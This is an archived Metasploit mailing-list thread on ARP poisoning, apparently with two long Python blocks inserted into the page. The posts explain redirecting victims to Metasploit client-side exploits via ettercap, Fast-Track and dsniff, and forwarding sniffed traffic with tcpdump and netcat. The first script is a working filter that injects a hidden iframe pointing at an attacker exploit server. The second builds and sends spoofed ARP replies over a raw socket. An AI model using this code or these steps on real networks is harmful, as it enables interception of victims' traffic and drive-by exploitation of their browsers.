Metasploit mailing list archives
ARP Poisoning
From: wullie19 at ntlworld.com (rogue)
Date: Fri, 17 Apr 2009 07:44:07 +0100
Hi there, I'm not sure about doing this on a pivot (that's a trick I really would like to know) but I guess it comes down to the OSes involved. To redirect someone via ARP poisoning to a Metasploit client-side attack you can use ettercap with a custom filter to swap img tags for iframes pointing at the attack machine. Or alternatively you can use Fast-Track's mass client-side attack, which sets up a web server, creates an index.htm full of iframes pointing at waiting Metasploit client-side exploits, and uses ARP poisoning to redirect the victims to our attack machine.

-rogue
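The img-to-iframe swap rogue describes is done in the MITM position on the HTTP response stream. The following is an added example, not from the post and not ettercap's filter code: it models that rewrite in Python and adds the two pieces of bookkeeping a working filter needs, which the post does not mention: the client's Accept-Encoding header is neutralised (same-length replacement, so no TCP sequence numbers shift) so the server answers in rewritable plaintext, and Content-Length is recomputed after the swap so the browser does not truncate the injected page. The attacker URL, request and response below are made-up sample values.

```python
"""Model of an ettercap-style HTTP filter: swap the first <img ...> in an
HTML response for a hidden <iframe> pointing at the attacker's exploit server.

Added example for this thread (not code from the post or from ettercap).
ATTACKER_URL and the SAMPLE_* messages are constructed values.
"""
import re

ATTACKER_URL = "http://10.0.0.66:8080/"   # assumed Metasploit browser-exploit server
IFRAME = (f'<iframe src="{ATTACKER_URL}" width="0" height="0" '
          'style="display:none"></iframe>').encode()
IMG_TAG = re.compile(rb"<img\b[^>]*>", re.IGNORECASE)

# Constructed sample traffic (not captured from a real host).
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                  b"Accept-Encoding: gzip, deflate\r\n\r\n")
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                   b"Content-Length: 46\r\n\r\n"
                   b'<html><body><img src="logo.png"></body></html>')


def neutralise_accept_encoding(request: bytes) -> bytes:
    """Break the client's Accept-Encoding header so the server sends plain
    text we can edit. The replacement has the same length (15 bytes), so the
    TCP segment size and sequence numbers are untouched."""
    return request.replace(b"Accept-Encoding", b"Accept-Rubbish!")


def split_response(response: bytes):
    """Return (header lines, body); raises if the header block is incomplete."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    return head.split(b"\r\n"), body


def header(headers, name: bytes):
    """Case-insensitive header lookup; None if absent."""
    for line in headers:
        key, _, value = line.partition(b":")
        if key.strip().lower() == name.lower():
            return value.strip()
    return None


def content_length(headers):
    value = header(headers, b"Content-Length")
    return int(value) if value is not None else None


def inject_iframe(response: bytes) -> bytes:
    """Swap the first <img ...> for IFRAME and fix Content-Length.

    Leaves the response alone when it is not HTML, when the body is
    compressed (we could not edit it anyway) or when it is chunked (editing
    would corrupt the chunk sizes), or when there is no <img> to swap.
    """
    headers, body = split_response(response)
    ctype = header(headers, b"Content-Type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return response
    if header(headers, b"Content-Encoding") not in (None, b"identity"):
        return response
    if header(headers, b"Transfer-Encoding") not in (None, b"identity"):
        return response
    new_body, n = IMG_TAG.subn(IFRAME, body, count=1)
    if n == 0:
        return response
    new_headers = []
    for line in headers:
        if line.partition(b":")[0].strip().lower() == b"content-length":
            new_headers.append(b"Content-Length: " + str(len(new_body)).encode())
        else:
            new_headers.append(line)
    return b"\r\n".join(new_headers) + b"\r\n\r\n" + new_body


if __name__ == "__main__":
    print(neutralise_accept_encoding(SAMPLE_REQUEST).decode())
    print(inject_iframe(SAMPLE_RESPONSE).decode())
```

Only the first image is swapped: one iframe is enough to make the browser fetch the exploit page, and replacing every image would load it repeatedly.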
Hmm. Well, maybe. Firstly, I went back and re-read your original question. You asked about traffic to a specific destination host. The methods I outlined will redirect *all* the victim's traffic to the other machine; you'll then have to decide what to do with it. Check out the whole dsniff suite; you can do a lot with it besides the redirection, but it's mainly MITM/eavesdropping attacks. If you want to, say, redirect all the victim's traffic through yourself and serve up a browser attack back to the target on port 80 with Metasploit, I think that could work. Actually, that's something I've been meaning to try; if anyone has done this, I'd like to hear about it.

Now then, in your scenario below: is the pivot machine on the same subnet as the victim? If so, you can ARP poison the target and save a copy of the traffic locally on the pivot machine (tcpdump), or encapsulate and forward a copy to your off-subnet attack machine. Something like tcpdump eth0 | netcat <options> might work for this. There may be better tools, but I don't know what they are. If the target machine is compromised, and that technique works, you could use that to get it off-subnet directly. Without knowing more about what you're trying to do and the OSes involved that's about all I can come up with.

J-.

Bryan Richardson wrote:
> Hey Jim,
> Thanks for the response. That's great news. One quick question... if my attack machine is on a different subnet, but I'm pivoting through another compromised machine, is there a way to still make this work?
> -- Bryan
>
> On Thu, Apr 16, 2009 at 9:33 AM, jim <jimbo at abs.net> wrote:
>> If the host is already compromised, you can use the "arp" command to make a static arp entry. If it's not, you can use the dsniff utility to poison its arp cache. Note that this is a layer 2 redirection so the machine to which you're redirecting traffic must be on the same IP subnet.
>> Jim
>>
>> Bryan Richardson wrote:
>>> Hello All,
>>> I've poked around a little bit in the code and on the mailing list, but I haven't found an answer to a question I have: Is it possible to conduct ARP poisoning (or some other act) so as to direct traffic from a compromised host destined for a particular IP address to the attacker's machine?
>>> -- Thanks! Bryan

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
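Jim's two points, that dsniff poisons the victim's ARP cache and that the redirect only works at layer 2 on the victim's own subnet, are easier to see from the frame itself. The following is an added example, not from the thread and not dsniff's or ettercap's code: it builds the unsolicited ARP "is-at" reply an arpspoof-style tool sends, decodes it the way tcpdump would, applies it to a simplified model of the victim's ARP cache (including the static entry set with `arp -s` that such a reply does not overwrite), and checks the subnet constraint. All MAC and IP addresses are made-up sample values; `send_frame` uses a Linux raw socket and is not exercised by the demo.

```python
"""What an ARP-poisoning tool puts on the wire, and why it stays on-subnet.

Added example for this thread; not code from the posts, from dsniff or from
ettercap. Addresses and the cache contents below are constructed values.
"""
import ipaddress
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, ethertype
ARP_PKT = struct.Struct("!HHBBH6s4s6s4s")   # htype ptype hlen plen op sha spa tha tpa


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(attacker_mac: str, spoofed_ip: str,
                    victim_mac: str, victim_ip: str) -> bytes:
    """Unicast frame to the victim claiming `spoofed_ip` is at `attacker_mac`.

    This unsolicited "is-at" reply is the core of dsniff's arpspoof and of
    ettercap -M arp; the victim's stack overwrites its cache entry with it.
    """
    eth = ETH_HDR.pack(mac_bytes(victim_mac), mac_bytes(attacker_mac), ETH_P_ARP)
    arp = ARP_PKT.pack(1, 0x0800, 6, 4, ARP_REPLY,
                       mac_bytes(attacker_mac), socket.inet_aton(spoofed_ip),
                       mac_bytes(victim_mac), socket.inet_aton(victim_ip))
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame into the fields tcpdump would print."""
    dst, src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not Ethernet/IPv4 ARP")
    return {
        "eth_dst": mac_str(dst), "eth_src": mac_str(src),
        "op": "reply" if op == ARP_REPLY else "request",
        "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
        "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa),
    }


def apply_to_cache(cache: dict, frame: bytes, static: frozenset = frozenset()) -> bool:
    """Simplified victim ARP cache update; True if an entry changed.

    Real stacks differ in whether they accept unsolicited replies for IPs
    they have never resolved; this model accepts any reply. Entries in
    `static` (an `arp -s` entry on the host) are never overwritten.
    """
    p = parse_arp(frame)
    ip, mac = p["sender_ip"], p["sender_mac"]
    if ip in static or cache.get(ip) == mac:
        return False
    cache[ip] = mac
    return True


def same_subnet(ip_a: str, ip_b: str, prefix_len: int) -> bool:
    """ARP is link-local and routers never forward it, so a poisoned entry can
    only point at a MAC on the victim's own segment: the redirect target
    (attacker or pivot) must share the victim's IP subnet."""
    net = ipaddress.ip_network(f"{ip_a}/{prefix_len}", strict=False)
    return ipaddress.ip_address(ip_b) in net


def send_frame(frame: bytes, iface: str) -> int:
    """Put the frame on the wire. Linux only (AF_PACKET), needs CAP_NET_RAW."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        return s.send(frame)


if __name__ == "__main__":
    # Constructed scenario: victim 10.0.0.20 is told that its gateway
    # 10.0.0.1 lives at the attacker's MAC.
    frame = build_arp_reply("de:ad:be:ef:00:01", "10.0.0.1",
                            "00:11:22:33:44:55", "10.0.0.20")
    cache = {"10.0.0.1": "aa:bb:cc:dd:ee:01"}   # the real gateway MAC
    print(parse_arp(frame))
    print("poisoned:", apply_to_cache(cache, frame), cache)
    print("static entry resists:",
          apply_to_cache({"10.0.0.1": "aa:bb:cc:dd:ee:01"}, frame, frozenset({"10.0.0.1"})))
    print("attacker on 10.0.1.0/24 reachable by ARP?", same_subnet("10.0.0.20", "10.0.1.5", 24))
```

The same_subnet check is the reason for the pivot arrangement discussed above: the poisoned victim can only be steered to a MAC on its own segment, so an off-subnet attack machine has to receive the traffic via a host on that segment (the pivot) rather than directly.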
Current thread:
- ARP Poisoning Bryan Richardson (Apr 16)
- ARP Poisoning jim (Apr 16)
- ARP Poisoning Bryan Richardson (Apr 16)
- ARP Poisoning jim (Apr 16)
- ARP Poisoning rogue (Apr 16)
- ARP Poisoning Bryan Richardson (Apr 16)
- ARP Poisoning jim (Apr 16)